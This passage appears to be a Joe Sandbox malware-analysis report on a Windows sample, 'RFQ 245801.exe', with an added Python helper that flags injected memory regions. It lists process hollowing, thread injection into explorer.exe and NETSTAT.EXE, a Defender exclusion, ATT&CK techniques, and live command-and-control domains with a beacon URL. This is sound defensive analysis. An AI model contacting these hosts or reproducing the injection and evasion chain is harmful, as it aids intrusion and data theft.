          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00645FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00645FE5
          Source: C:\Users\user\Desktop\RFQ 245801.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 7_2_00644B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx
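The Yara-hit memory dump identifiers listed in the two sections above encode where in each process the FormBook payload was found. The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report or of any Joe Security tool. The field layout it assumes (process index, analysis phase, sequence number, base address, a PAGE_* protection value, a flags field whose meaning is not determined here, a MEM_* region type, trailing zeros) is inferred from the identifiers on this page and is not documented anywhere on it, so the decoding is an assumption; the process-to-image mapping comes from the report's own source paths. It groups the hits by process and flags regions that are writable, executable and not a loaded image, which is the footprint of code written into or mapped into a process.

```python
"""Triage of Joe Sandbox memory-dump identifiers that carried Yara hits."""
import re
from collections import defaultdict

# Yara-hit dump identifiers copied from the report sections above.
YARA_HIT_DUMPS = [
    "00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp",
    "00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp",
    "00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp",
    "00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp",
    "00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
]

# Process index -> image, taken from the report (0 = initial sample,
# 5 = the second RFQ 245801.exe instance, 7 = NETSTAT.EXE).
PROCESS_IMAGES = {0: "RFQ 245801.exe", 5: "RFQ 245801.exe", 7: "NETSTAT.EXE"}

# Standard Win32 constants from winnt.h (values are certain). That the
# fifth and seventh dump-name fields hold a PAGE_* and a MEM_* value is
# an assumption inferred from the identifiers on this page.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<flags>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\."
    r"(?P<extra>[0-9A-Fa-f]{8})\.sdmp$"
)


def parse_dump_name(name):
    """Split one .sdmp identifier into its fields (assumed layout, see above)."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name}")
    protect = int(m["protect"], 16) & 0xFF  # drop PAGE_GUARD/NOCACHE modifier bits
    mtype = int(m["mtype"], 16)
    return {
        "pid": int(m["pid"], 16),
        "phase": int(m["phase"], 16),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, f"0x{protect:x}"),
        "type_name": MEM_TYPE.get(mtype, f"0x{mtype:x}"),
        "flags": int(m["flags"], 16),  # meaning of this field not determined here
        # Writable and executable memory that is not a loaded image section is
        # the classic footprint of a payload written or mapped into a process.
        "suspicious": protect in EXECUTABLE and protect in WRITABLE and mtype != 0x1000000,
    }


def hits_by_process(names):
    """Group parsed Yara-hit dumps by process index, each list sorted by base address."""
    groups = defaultdict(list)
    for name in names:
        parsed = parse_dump_name(name)
        groups[parsed["pid"]].append(parsed)
    for regions in groups.values():
        regions.sort(key=lambda r: r["base"])
    return dict(groups)


def injected_processes(names):
    """Process indices holding at least one suspicious (RWX, non-image) Yara-hit region."""
    return sorted(pid for pid, regions in hits_by_process(names).items()
                  if any(r["suspicious"] for r in regions))


def report(names):
    """Print one line per Yara-hit region, grouped by process."""
    for pid, regions in sorted(hits_by_process(names).items()):
        print(f"process {pid} ({PROCESS_IMAGES.get(pid, 'unknown image')}):")
        for r in regions:
            mark = "  <-- RWX and not an image section" if r["suspicious"] else ""
            print(f"  0x{r['base']:08X}  {r['protect_name']:<24}{r['type_name']}{mark}")


if __name__ == "__main__":
    report(YARA_HIT_DUMPS)
```

Run stand-alone it prints the five hits grouped by process. Under the assumed decoding, process 5 carries the payload at 0x400000 as RWX private memory and process 7 (NETSTAT.EXE) carries two RWX mapped regions, while the hit in process 0 sits in ordinary read-write private memory; that distribution lines up with the process hollowing and section-mapping signatures the report lists for this sample.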
          MITRE ATT&CK Matrix

          Tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

          Techniques matched for this sample, in the order they appear in the matrix (a technique that belongs to several tactics is listed once):

          • Shared Modules
          • DLL Side-Loading
          • Access Token Manipulation
          • Masquerading
          • System Time Discovery
          • Archive Collected Data
          • Encrypted Channel
          • Process Injection
          • Disable or Modify Tools
          • Security Software Discovery
          • Ingress Tool Transfer
          • Abuse Elevation Control Mechanism
          • Virtualization/Sandbox Evasion
          • Process Discovery
          • Non-Application Layer Protocol
          • Application Layer Protocol
          • Application Window Discovery
          • Deobfuscate/Decode Files or Information
          • System Network Configuration Discovery
          • System Network Connections Discovery
          • Obfuscated Files or Information
          • File and Directory Discovery
          • Software Packing
          • System Information Discovery
          Behavior Graph (ID: 1528045; Sample: RFQ 245801.exe; Start date: 07/10/2024; Architecture: WINDOWS; Score: 100)

          • Start: contacts www.venir-bienne.info, www.sx9u.shop and 9 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures.
          • RFQ 245801.exe (started): drops C:\Users\user\AppData\...\RFQ 245801.exe.log (CSV). Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes.
            • RFQ 245801.exe (child process): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures. Injects into explorer.exe.
              • explorer.exe (injected): connects to www.j88.travel (188.114.96.3, ports 49743 and 80, CLOUDFLARENETUS, European Union). Signatures: System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports.
                • NETSTAT.EXE (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces.
                  • cmd.exe (started)
                    • conhost.exe (started)
            • powershell.exe (started): Loading BitLocker PowerShell Module.
              • conhost.exe (started)
            • RFQ 245801.exe (second child process, no signatures shown)

          Antivirus detection (Source | Detection | Scanner | Label)
          RFQ 245801.exe | 45% | ReversingLabs | ByteCode-MSIL.Trojan.Nekark
          RFQ 245801.exe | 100% | Joe Sandbox ML | 
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          URL reputation (Source | Detection | Scanner | Label)
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
          https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
          http://www.fontbureau.com/designers | 0% | URL Reputation | safe
          https://excel.office.com | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
          https://word.office.com | 0% | URL Reputation | safe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
          https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
          http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
          http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
          https://powerpoint.office.comcember | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://schemas.micro | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe
          Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
          www.j88.travel | 188.114.96.3 | true | true |  | unknown
          www.oko.events | 185.26.122.70 | true | true |  | unknown
          www.458881233.men | unknown | unknown | true |  | unknown
          www.khizmetlergirisyapzzz2024.net | unknown | unknown | true |  | unknown
          www.ridges-freezers-56090.bond | unknown | unknown | true |  | unknown
          www.ilw.legal | unknown | unknown | true |  | unknown
          www.sx9u.shop | unknown | unknown | true |  | unknown
          www.venir-bienne.info | unknown | unknown | true |  | unknown
          www.delark.click | unknown | unknown | true |  | unknown
          www.02s-pest-control-us-ze.fun | unknown | unknown | true |  | unknown
          www.earing-tests-69481.bond | unknown | unknown | true |  | unknown
          Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
          http://www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF | true |  | unknown
                                                                                              unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.consuyt.xyz/c24t/explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.lc-driving-school.netReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://www.02s-pest-control-us-ze.fun/c24t/www.sx9u.shopexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://schemas.micrexplorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.carterandcone.comlRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.delark.clickexplorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.aithful.eventsReferer:explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlRFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000006.00000000.1739582157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
